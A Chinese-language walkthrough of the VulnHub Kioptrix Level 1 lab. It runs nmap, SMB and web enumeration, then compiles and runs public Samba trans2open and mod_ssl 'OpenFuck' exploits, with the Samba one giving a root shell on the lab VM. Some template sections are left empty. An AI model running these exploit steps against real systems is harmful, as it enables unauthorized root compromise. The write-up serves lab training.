Overview| Name | Template |

薄弱点1. gcc编译处理

Nmap扫描```bash

ports=$(nmap -p- –min-rate=1000 -T4 10.10.10.9 | grep -oE ‘(^[0-9][^/tcp]*)’ | tr ‘\n’ ‘,’)
nmap -p$ports -sV -sC -O 10.10.10.9 -oN nmap.txt

第一行代码使用nmap命令扫描本地主机的所有端口（从1到65535），–min-rate=1000参数表示每秒发送最少1000个包，-T4参数表示设置扫描速度为快速扫描模式。

grep -oE ‘(^[0-9][^/tcp]*)’用于提取输出结果中的端口号，tr ‘\n’ ‘,’用于将提取的端口号按逗号分隔并拼接成一个字符串。

第二行代码使用nmap命令再次扫描指定的端口，-p$ports参数表示扫描之前提取的端口列表，-sV参数表示进行服务版本检测，-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测，-O参数表示进行操作系统版本检测，-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.101 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.101 -oN nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-04 20:27 CST
Nmap scan report for 10.10.10.9
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-08-04T12:29:55+00:00; +1m50s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.82 seconds

枚举### SMB 枚举> Port: 139 389 445 636

enum4linux -a/-A 127.0.0.1

┌──(root㉿kill3r)-[/home/kill3r]
└─$ enum4linux -A 10.10.10.9
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug 4 20:29:56 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.9
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================( Enumerating Workgroup/Domain on 10.10.10.9 )=============================
[+] Got domain/workgroup name: MYGROUP
====================================( Session Check on 10.10.10.9 )====================================
[+] Server 10.10.10.9 allows sessions using username '', password ''
=================================( Getting domain SID for 10.10.10.9 )=================================
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Fri Aug 4 20:29:56 2023

MSF-SMB

# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
[*] 10.10.10.9:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.10.10.9:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.10.10.9: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
[*] 10.10.10.9:139 - Starting module
[*] 10.10.10.9:445 - Starting module
[*] 10.10.10.9: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid
[*] 10.10.10.9: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Web> HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb````bash

用于识别和分析目标网站的技术栈、CMS（内容管理系统）、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容

┌──(root㉿kill3r)-[~]
└─# whatweb 10.10.10.9
http://10.10.10.9 [200 OK] Apache[1.3.20][mod_ssl/2.8.4], Country[RESERVED][ZZ], Email[webmaster@example.com], HTTPServer[Red Hat Linux][Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b], IP[10.10.10.9], OpenSSL[0.9.6b], Title[Test Page for the Apache Web Server on Red Hat Linux]

- 目录枚举
`dirb http://192.168.56.101`
`dirsearch -u http://192.168.56.101 -r`
`gobuster dir -w ... -u http://192.168.56.101 -x html,php,js,bak`
```bash
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.9 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/04 22:41:08 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 269]
/index.html (Status: 200) [Size: 2890]
/test.php (Status: 200) [Size: 27]
/manual (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
/usage (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
/mrtg (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
/.html (Status: 403) [Size: 269]
Progress: 1100338 / 1102805 (99.78%)===============================================================
2023/08/04 22:46:47 Finished
===============================================================

漏洞扫描

1 2	$ nikto -h http://www.example.com/ $ nuclei -u https://example.com/

wordlist- cewl.list:

cewl http://192.168.56.101/ -w dict.txt

1
2
3

```
- pass.list
```plaintext

user.list

1 2	```plaintext - hash.list

1 2	- information.list ```bash

Wappalyzer```bash

Web 服务器:Apache HTTP Server 1.3.20
操作系统:UNIX
Web 服务器扩展:OpenSSL 0.9.6b
mod_ssl:2.8.4

## 复现过程### 访问靶场,寻找功能点
无功能点,继续分析其他服务
### 信息分析### SMB- Samba 2.2.1a
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─$ searchsploit Samba 2.2.1a
---------------------------------------------------------------------------- --------------------------------- Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results

最终测试得10.c可用,直接获取shell权限

┌──(root㉿kill3r)-[/home/kill3r]
└─$ gcc 10.c -o samba
┌──(root㉿kill3r)-[/home/kill3r]
└─$ ./samba -b O 10.10.10.9
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

Mod_ssl:2.8.4

┌──(root㉿kill3r)-[~/.ssh]
└─# searchsploit mod_ssl 2.8.4
---------------------------------------------------------------------------- --------------------------------- Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
---------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results
┌──(root㉿kill3r)-[/home/kill3r]
└─# gcc -o OpenFuck 47080.c -lcrypto
┌──(root㉿kill3r)-[/home/kill3r]
└─# ./OpenFuck -h | grep apache-1.3.20
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
# 我这里只获取到了apache权限,估计是因为编译的时候出问题了吧
┌──(root㉿kill3r)-[/home/kill3r]
└─# ./OpenFuck 0x6b 10.10.10.9

Flag as user1```plaintext

## Shell as user1
## Shell as user2## 以root身份进入Shell> 保存屏幕截图作为Flag或Proof

本文由 kill3r 原创,采用署名-非商业性使用-相同方式共享 4.0 国际许可协议，转载请注明出处。

VulnHub-Kioptrix Level 1 古老的 Apache Vuln